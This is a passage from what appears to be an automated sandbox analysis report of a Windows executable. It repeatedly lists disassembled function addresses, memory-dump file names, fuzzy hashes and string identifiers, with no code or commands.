                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: ef693a9fee3d51f3574c8e6bacefef777d5f6dc2f55b281feb1f75cbc5a1b767
                                                                                                      • Instruction ID: 9df0fe1025129acfe79442510c942cebf463942cd75c2de8f78e4bd7a32b33f3
                                                                                                      • Opcode Fuzzy Hash: ef693a9fee3d51f3574c8e6bacefef777d5f6dc2f55b281feb1f75cbc5a1b767
                                                                                                      • Instruction Fuzzy Hash: A5C1D2B1D092A88AFB218A24CC447EABBB5EF95304F0480FAD44D67281D77A5FC5CF56
                                                                                                      Function 0040B224 Relevance: 30.3, Strings: 24, Instructions: 297COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 3a83853534d0ee085842c4be7b0d5724d769cf245ef3a7700eaca01f064e2cb2
                                                                                                      • Instruction ID: e1e2c7e0b25d6421c33c1a0cc452087aa9473797f245ea2022cc50907a92f680
                                                                                                      • Opcode Fuzzy Hash: 3a83853534d0ee085842c4be7b0d5724d769cf245ef3a7700eaca01f064e2cb2
                                                                                                      • Instruction Fuzzy Hash: B9C1A371D042688AFB248B24DC447EABBB1EF91304F1480FAD54D67282D77D5FC58B96
                                                                                                      Function 004134C9 Relevance: 30.3, Strings: 24, Instructions: 295COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: c760107619a6fbe031677cd7b7a6cd8df97c287c0992fe2eb0de49f5fa278433
                                                                                                      • Instruction ID: 237f86ee0e1044732438d87c930e45975df364f6ec19a7b0064dc2fc07ed9dae
                                                                                                      • Opcode Fuzzy Hash: c760107619a6fbe031677cd7b7a6cd8df97c287c0992fe2eb0de49f5fa278433
                                                                                                      • Instruction Fuzzy Hash: 41C1E371D082A88AF7218A24DC447EABBB5EF91304F1480FAD44D67281D77A5FC5CFA6
                                                                                                      Function 00414390 Relevance: 30.3, Strings: 24, Instructions: 293COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 756cf9ae9210ad9504debb715fffdc599862e7cbbece7824cbedd43d26cbcdf2
                                                                                                      • Instruction ID: 791a237b1a22265a6694fd2a56c849464e0c383c56e5466e77da2874f7916eb7
                                                                                                      • Opcode Fuzzy Hash: 756cf9ae9210ad9504debb715fffdc599862e7cbbece7824cbedd43d26cbcdf2
                                                                                                      • Instruction Fuzzy Hash: 88C1B171D092A88AEB208B14CC447EABBB1AF91304F1480FAD44D67281DB7A5FD5CF96
                                                                                                      Function 0040B23D Relevance: 30.3, Strings: 24, Instructions: 286COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 86e50c987fcf4a6a66c163b9cd354a5f675d6a1a2be9c053f00618e1a9f62544
                                                                                                      • Instruction ID: aaa0545a91e2eee1d25ea9e6f7ae26783c51a421b8dfe44540657a9c25b6c17e
                                                                                                      • Opcode Fuzzy Hash: 86e50c987fcf4a6a66c163b9cd354a5f675d6a1a2be9c053f00618e1a9f62544
                                                                                                      • Instruction Fuzzy Hash: 82C19171D042A88AFB248B25DC447EABBB1EF51304F1480FAD44D67282DB7D5FC58BA6
                                                                                                      Function 00413666 Relevance: 30.3, Strings: 24, Instructions: 284COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: f3df7d0ce13461d924e4566d21b814f8ebb9e007eb424ecc89adb03fa4b88d2a
                                                                                                      • Instruction ID: 6afae43038a8290963eca38c0068c3f02acc937650a343cc20a864d56ea9caca
                                                                                                      • Opcode Fuzzy Hash: f3df7d0ce13461d924e4566d21b814f8ebb9e007eb424ecc89adb03fa4b88d2a
                                                                                                      • Instruction Fuzzy Hash: 12C1C5B1D096A88AF7208B14CC447DABBB1EF95304F0480FAD44D67281DB795FC58F96
                                                                                                      Function 004140D1 Relevance: 30.3, Strings: 24, Instructions: 270COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: 0e76f08d5e26f1e2fa805c1c304f6766b0d81428349fbc2df1bc2bd729f96c26
                                                                                                      • Instruction ID: 7f5b2847943bf926b0cfb7d37202c9f9c11c14a57738ef2b6b51e89c54a62067
                                                                                                      • Opcode Fuzzy Hash: 0e76f08d5e26f1e2fa805c1c304f6766b0d81428349fbc2df1bc2bd729f96c26
                                                                                                      • Instruction Fuzzy Hash: 3DC1B1B1D092A88AFB208B24CC447DABBB1EF95304F1480FAD44C67281DB795FD58F96
                                                                                                      Function 0040B655 Relevance: 30.3, Strings: 24, Instructions: 269COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: fdeeb27bbf0f0ba3a5973da0d279ff4fe2c3cfc5221f6d716653c4cc6f2567ae
                                                                                                      • Instruction ID: 2b0e1f5d629f2816e3d3c850fb0b03aad0abfa970d5c474c3838aaf950cf3745
                                                                                                      • Opcode Fuzzy Hash: fdeeb27bbf0f0ba3a5973da0d279ff4fe2c3cfc5221f6d716653c4cc6f2567ae
                                                                                                      • Instruction Fuzzy Hash: B9B1A271D096A88AFB248A25CC447DABBB1EF51304F1480FAC44D67282DB7E5FC58F96
                                                                                                      Function 00413513 Relevance: 30.3, Strings: 24, Instructions: 267COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 0-2584887423
                                                                                                      • Opcode ID: a5e95cb365b806352060f7f7ea973d16536aaa13ef085ee0047bc6572636a60f
                                                                                                      • Instruction ID: d674ffbbc4bb0062beaadf086bbf99c9783f3e7649bb8191311219ed2cdb6dd5
                                                                                                      • Opcode Fuzzy Hash: a5e95cb365b806352060f7f7ea973d16536aaa13ef085ee0047bc6572636a60f
                                                                                                      • Instruction Fuzzy Hash: 56B1E371D086A88AF7208A24DC447DABBB1EF55304F0480FAD44C67281DB7D5FC58FA6
                                                                                                      Function 00412485 Relevance: 30.3, Strings: 24, Instructions: 259COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: E$L$L$P$W$^ ]$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 621844428-2584887423
                                                                                                      • Opcode ID: 49fd816f47c523ffebb1f03c6b59b3991361845e2a65b613dddfb39e34afb0a4
                                                                                                      • Instruction ID: 0b1451068fc1aadd00234587de2006cdfe6941b0f1d9b1e504d2e33887234ed4
                                                                                                      • Opcode Fuzzy Hash: 49fd816f47c523ffebb1f03c6b59b3991361845e2a65b613dddfb39e34afb0a4
                                                                                                      • Instruction Fuzzy Hash: 4DB1C4B1D082A88AFB218624CC447DABBB1EF51304F1440FAD44D57282DA7E5FC58FA6
                                                                                                      Function 0040D381 Relevance: 30.3, Strings: 24, Instructions: 258COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
